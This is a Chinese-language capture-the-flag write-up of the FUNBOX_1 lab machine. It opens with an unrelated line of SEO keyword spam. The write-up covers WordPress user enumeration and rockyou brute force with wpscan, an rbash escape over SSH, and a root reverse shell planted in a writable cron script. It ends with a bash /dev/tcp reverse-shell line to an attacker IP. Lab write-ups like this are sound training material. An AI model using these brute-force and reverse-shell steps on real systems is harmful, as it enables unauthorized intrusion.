网站不备案访问,wordpress怎么设置访问,做网站的结论和心得,aso优化什么意思是FUNBOX_1靶场复盘
这个系列的靶场给出的干扰因素都挺多的#xff0c;必须从中找到有用的线索才可以。
这个靶场你扫描到ip地址后打开网页会发现#xff0c;ip自动转换成域名了#xff0c;所以我们需要添加一条hosts解析才可以。
192.168.102.190 funbox.fritz.box从目录…FUNBOX_1靶场复盘
这个系列的靶场给出的干扰因素都挺多的必须从中找到有用的线索才可以。
这个靶场你扫描到ip地址后打开网页会发现ip自动转换成域名了所以我们需要添加一条hosts解析才可以。
192.168.102.190 funbox.fritz.box从目录扫描中可以看出这是一个wordpress的网站。 利用wpscan工具可以枚举wordpress的用户名。
wpscan --url http://funbox.fritz.box --enumerate u然后对用户名进行爆破一下发现两个的密码都出来了。
wpscan --url http://funbox.fritz.box -U users -P /usr/share/wordlists/rockyou.txt这里是利用joe用户进行了ssh登陆当然也可以登陆wordpress后台但是没什么可用的东西。
登陆后发现这是一个rbash就是这是一个只读bash。 利用ssh的-t参数我们可以跳过这个限制。 ssh上来后,ls一下发现有个mbox文件发现类似两个邮件并且是隔了几分钟的所以就怀疑后台在运行着一个计时任务。
就wget下来一个pspy64这个文件可以实时监控进程。 发现的确有一个计时任务有两个用户都在运行一个是UID为1000的一个是root用户只要我们能往这里面写的内容就可以拿到一个root的反弹shell。 发现这个文件我们是可修改的在里面添加了一条反弹shell文件就等拿到UID为1000的权限或者root权限如过没拿到ROOT权限就重新监听一下。 过了一会儿就拿到root权限了这里应该是普通用户执行两次后root用户才会执行一次所以要监控好root用户什么时候执行。
bash -i /dev/tcp/192.168.102.129/8888 01